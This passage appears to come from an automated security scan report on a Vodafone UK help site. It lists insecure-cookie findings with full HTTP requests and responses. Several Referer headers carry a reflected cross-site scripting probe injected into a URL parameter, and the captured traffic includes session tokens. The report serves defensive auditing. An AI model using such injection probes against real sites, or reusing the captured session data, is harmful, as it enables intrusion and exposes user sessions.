Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40396

<!DOCTYPE html>


<!--[if IE 8 ]> <html lang="en" class="no-js ie
...[SNIP]...

3.4. https://help.vodafone.co.uk/system/selfservice.controller previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://help.vodafone.co.uk
Path:	/system/selfservice.controller

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

eGain_eService_JSESSIONID=h8jsTGrJZ3ClMP4SCtKpG16GKR1w2mRnvclsDtZ4vMJXWWpz0QPp!39658889; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000 HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&PARTITION_ID=1&CONFIGURATION=1000&SIDE_LINK_TOPIC_ID=1009&TOPIC_ID=1009&TOPIC_TYPE=0&STARTING_ID=0&TOPIC_NAME=Going%20abroad%20&PARENT_TOPIC_ID=-1&PARENT_TOPIC_TYPE=0&SOURCE_FORM=BROWSE_TOPIC
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=y1TnTGqLtm1BsvXyTPM3zsVTQJhzW4D3Qvskgn1GzLmHXtM2k1Bx!656056821; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Nov 2011 19:00:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: private
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: eGain_eService_JSESSIONID=h8jsTGrJZ3ClMP4SCtKpG16GKR1w2mRnvclsDtZ4vMJXWWpz0QPp!39658889; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...

3.5. https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/redesign/reset.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/css/selfservice/templates/vodafone/redesign/reset.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=1392511242.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/css/selfservice/templates/vodafone/redesign/reset.css HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 1539
Content-Type: text/css
Last-Modified: Mon, 06 Jun 2011 17:05:42 GMT
Accept-Ranges: bytes
ETag: "0b789f76b24cc1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:38 GMT
Set-Cookie: BIGipServerpool_ems00820ss=1392511242.20480.0000; path=/

/* Browser Reset CSS, Eric Meyer. */

html, body, div, span, applet, object, iframe,
h1, h2, h3, h4, h5, h6, p, blockquote, pre,
a, abbr, acronym, address, big, cite, code,
del, dfn, em, font,
...[SNIP]...

3.6. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/articleappearance.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/articleappearance.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=704645386.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/articleappearance.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 7457
Content-Type: application/octet-stream
Last-Modified: Mon, 23 Aug 2010 17:31:03 GMT
Accept-Ranges: bytes
ETag: "53dbc5f5e842cb1:11f2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:40 GMT
Set-Cookie: BIGipServerpool_ems00820ss=704645386.20480.0000; path=/

/*
This file contains the support functions for the articleappearance
template.
*/
var childWindows = new Array(100);
var noOfChildren = 0;

window.onbeforeunload = function()
{
/*Unloa
...[SNIP]...

3.7. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/browseTopic.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/browseTopic.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=721422602.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/browseTopic.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 2142
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2008 09:26:19 GMT
Accept-Ranges: bytes
ETag: "802f933d5bafc81:1191"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:40 GMT
Set-Cookie: BIGipServerpool_ems00820ss=721422602.20480.0000; path=/

function clickTopic(topicId, topicType, startingId, topicName, parentTopicId, parentTopicType, sourceForm, topicHrchy)
{
// TODO: what if browse form is not present??
if(typeof document.BROWSE
...[SNIP]...

3.8. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/commonVariables.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/commonVariables.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=671090954.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/commonVariables.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 260
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2008 09:26:19 GMT
Accept-Ranges: bytes
ETag: "802f933d5bafc81:1249"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:42 GMT
Set-Cookie: BIGipServerpool_ems00820ss=671090954.20480.0000; path=/

var currentTopicId = 0;
var currentTopicType = 0;

function initializeCommonTopicRelatedVariables(curTopicId, curTopicType)
{
currentTopicId = curTopicId;
currentTopicType = curTopicType;

...[SNIP]...

3.9. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/jcarousellite.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/jcarousellite.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=671090954.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/js/jcarousellite.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

3.10. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/jquery.ba-hashchange.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/jquery.ba-hashchange.min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=687868170.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/js/jquery.ba-hashchange.min.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 10151
Content-Type: application/octet-stream
Last-Modified: Tue, 25 May 2010 14:12:31 GMT
Accept-Ranges: bytes
ETag: "a63b595014fcca1:11f8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:40 GMT
Set-Cookie: BIGipServerpool_ems00820ss=687868170.20480.0000; path=/

/*!
* jQuery hashchange event - v1.2 - 2/11/2010
* http://benalman.com/projects/jquery-hashchange-plugin/
*
* Copyright (c) 2010 "Cowboy" Ben Alman
* Dual licensed under the MIT and GPL lic
...[SNIP]...

3.11. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/main.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/main.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=1375734026.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/js/main.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 9791
Content-Type: application/octet-stream
Last-Modified: Fri, 04 Jun 2010 13:44:37 GMT
Accept-Ranges: bytes
ETag: "86eca612ec3cb1:b66"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:40 GMT
Set-Cookie: BIGipServerpool_ems00820ss=1375734026.20480.0000; path=/

// Hide instruction text for password field
function txt2pwd(obj, pwd){
obj.style.visibility = "hidden";
document.getElementById(pwd).focus();
}

// Display instruction text for password field
...[SNIP]...

3.12. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery-1.4.2.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery-1.4.2.min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=771754250.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/js/redesign/jquery-1.4.2.min.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 72174
Content-Type: application/octet-stream
Last-Modified: Tue, 01 Jun 2010 10:26:54 GMT
Accept-Ranges: bytes
ETag: "02b7ff4741cb1:fd8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:38 GMT
Set-Cookie: BIGipServerpool_ems00820ss=771754250.20480.0000; path=/

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

3.13. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.ba-resize.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.ba-resize.min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=721422602.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/js/redesign/jquery.ba-resize.min.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 1098
Content-Type: application/octet-stream
Last-Modified: Tue, 01 Jun 2010 10:26:54 GMT
Accept-Ranges: bytes
ETag: "02b7ff4741cb1:1191"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:37 GMT
Set-Cookie: BIGipServerpool_ems00820ss=721422602.20480.0000; path=/

/*
* jQuery resize event - v1.1 - 3/14/2010
* http://benalman.com/projects/jquery-resize-plugin/
*
* Copyright (c) 2010 "Cowboy" Ben Alman
* Dual licensed under the MIT and GPL licenses.
* http
...[SNIP]...

3.14. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.easing.1.3.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.easing.1.3.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=687868170.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/js/redesign/jquery.easing.1.3.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 8097
Content-Type: application/octet-stream
Last-Modified: Tue, 01 Jun 2010 10:26:54 GMT
Accept-Ranges: bytes
ETag: "02b7ff4741cb1:11f8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:38 GMT
Set-Cookie: BIGipServerpool_ems00820ss=687868170.20480.0000; path=/

/*
* jQuery Easing v1.3 - http://gsgd.co.uk/sandbox/jquery/easing/
*
